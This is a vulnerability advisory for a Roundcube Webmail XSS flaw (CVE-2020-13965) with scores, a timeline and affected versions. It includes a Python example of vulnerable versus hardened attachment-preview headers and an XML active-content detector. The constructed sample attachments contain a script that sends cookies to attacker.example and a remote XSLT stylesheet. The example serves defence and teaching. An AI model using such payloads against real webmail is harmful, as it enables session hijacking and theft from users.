CVE-2020-13965
Roundcube Webmail Cross-Site Scripting (XSS) Vulnerability
Severity Score: 6.1 (CVSS v3.1)
Exploit Likelihood: EPSS (score not present on this page)
Affected Versions: CPE (see Affected Vendors, Products, and Versions below)
Public Exploits: 2 (multiple sources)
Exploited in Wild: Yes (CISA KEV)
Decision: Attend (SSVC)
Descriptions
An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.
An issue was detected in Roundcube Webmail versions prior to 1.3.12. An XSS vulnerability exists via a malicious XML attachment because text/xml is among the types allowed for a preview.
Roundcube Webmail contains a cross-site scripting (XSS) vulnerability that allows a remote attacker to manipulate data via a malicious XML attachment.
*Credits:
N/A
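The mechanism behind this CVE, as an added example that is not Roundcube's code: a browser that receives an XML document inline with Content-Type text/xml renders elements in the XHTML (or SVG) namespace as markup, so a script element inside an "XML attachment" executes in the webmail origin. The block below contrasts a preview header policy with text/xml on the allow-list (the behaviour the description above names) with a hardened policy that only ever shows XML as inert text, pins the type with nosniff and forces a download when the attachment carries any active-content indicator. The indicator check also serves as a triage helper for scanning stored attachments. All function names, header choices and sample attachments are constructed for this example; the vulnerable function models the described behaviour, not Roundcube's actual code path.

```python
"""
Added example, not Roundcube's code: why serving text/xml inline from an
attachment preview is an XSS sink, with a vulnerable and a hardened header
policy and an active-content check for XML attachments. Names and sample
data are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"
SVG_NS = "http://www.w3.org/2000/svg"
XML_TYPES = {"text/xml", "application/xml"}
# Types a browser renders as a document and may execute script from.
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "application/xslt+xml"} | XML_TYPES
# Types that are safe to show inline once the type is pinned with nosniff.
INERT_TYPES = {"text/plain", "image/png", "image/jpeg", "image/gif"}

# Constructed attachments (not real samples).
MALICIOUS_XML = b"""<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml"><body>
<script>new Image().src='https://attacker.example/c?'+document.cookie</script>
</body></html>"""
XSLT_XML = b"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://attacker.example/x.xsl"?>
<doc/>"""
BENIGN_XML = b"""<?xml version="1.0"?>
<invoice><id>42</id><total currency="EUR">19.99</total></invoice>"""

_DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.I)
_STYLESHEET_PI_RE = re.compile(rb"<\?xml-stylesheet\b", re.I)


def _ns(qname):
    return qname[1:qname.index("}")] if qname.startswith("{") else ""


def _local(qname):
    return qname.rpartition("}")[2].lower()


def xml_active_content_indicators(data):
    """Return the reasons an XML attachment must not be rendered inline.
    An empty list means no indicator was found, not that the file is safe."""
    if _DOCTYPE_RE.search(data):
        # A DTD enables entity expansion and external entities; refuse to parse.
        return ["doctype"]
    reasons = []
    if _STYLESHEET_PI_RE.search(data):
        reasons.append("xml-stylesheet")  # XSLT can emit HTML that carries script
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return reasons + ["malformed"]
    elements = list(root.iter())
    if any(_ns(el.tag) in (XHTML_NS, SVG_NS) for el in elements):
        reasons.append("renderable-namespace")
    if any(_local(el.tag) == "script" for el in elements):
        reasons.append("script-element")
    if any(_local(a).startswith("on") for el in elements for a in el.attrib):
        reasons.append("event-handler-attribute")
    return reasons


def vulnerable_preview_headers(declared_type):
    """Behaviour the advisory describes: text/xml sits on the preview
    allow-list and is served inline with its declared type."""
    allowed = INERT_TYPES | {"text/xml"}
    disposition = "inline" if declared_type in allowed else "attachment"
    return {"Content-Type": declared_type, "Content-Disposition": disposition}


def hardened_preview_headers(declared_type, data=b""):
    """XML is previewed only as inert text; any active indicator or any other
    browser-renderable type forces a download. The type is pinned with nosniff
    and a no-script, sandboxed CSP covers the whole preview response."""
    headers = {"X-Content-Type-Options": "nosniff",
               "Content-Security-Policy": "default-src 'none'; sandbox"}
    if declared_type in XML_TYPES and not xml_active_content_indicators(data):
        headers.update({"Content-Type": "text/plain; charset=utf-8",
                        "Content-Disposition": "inline"})
    elif declared_type in INERT_TYPES:
        headers.update({"Content-Type": declared_type,
                        "Content-Disposition": "inline"})
    else:
        headers.update({"Content-Type": "application/octet-stream",
                        "Content-Disposition": "attachment"})
    return headers


if __name__ == "__main__":
    for name, blob in [("malicious", MALICIOUS_XML), ("xslt", XSLT_XML),
                       ("benign", BENIGN_XML)]:
        print(name, xml_active_content_indicators(blob))
        print("  vulnerable:", vulnerable_preview_headers("text/xml"))
        print("  hardened:  ", hardened_preview_headers("text/xml", blob))
```

The DOCTYPE refusal matters because the check itself parses attacker-controlled XML: rejecting any DTD before calling the parser removes entity-expansion and external-entity tricks without needing a third-party library. Serving the XML source as text/plain with nosniff is what keeps a "preview" useful while denying the browser any reason to treat the bytes as a document.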
CVSS Scores
CVSS v3.1 metrics: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability (individual values not present on this page; base score 6.1)
CVSS v2.0 metrics: Attack Vector, Attack Complexity, Authentication, Confidentiality, Integrity, Availability (individual values not present on this page)
* Common Vulnerability Scoring System
SSVC
- Decision: Attend
- Exploitation, Automatable, Tech. Impact: values not present on this page
* Organization's Worst-case Scenario
Timeline
- 2020-06-09 CVE Reserved
- 2020-06-09 CVE Published
- 2024-04-13 First Exploit
- 2024-06-26 Exploited in Wild
- 2024-07-17 KEV Due Date
- 2024-08-04 CVE Updated
- 2024-10-03 EPSS Updated
CWE
- CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
References (10)
URL | Tag | Source
---|---|---
https://github.com/roundcube/roundcubemail/releases/tag/1.3.12 | Release Notes |
https://github.com/roundcube/roundcubemail/releases/tag/1.4.5 | Release Notes |

URL | Date | SRC
---|---|---
https://github.com/roundcube/roundcubemail/commit/884eb611627ef2bd5a2e20e02009ebb1eceecdc3 | 2024-07-03 |
https://github.com/roundcube/roundcubemail/compare/1.4.4...1.4.5 | 2024-07-03 |
Affected Vendors, Products, and Versions
Vendor | Product | Version | Other | Status
---|---|---|---|---
Roundcube | Webmail | < 1.3.12 | - | Affected
Roundcube | Webmail | >= 1.4.0 < 1.4.5 | - | Affected
Debian | Debian Linux | 9.0 | - | Affected
Debian | Debian Linux | 10.0 | - | Affected
Fedoraproject | Fedora | 31 | - | Affected
Fedoraproject | Fedora | 32 | - | Affected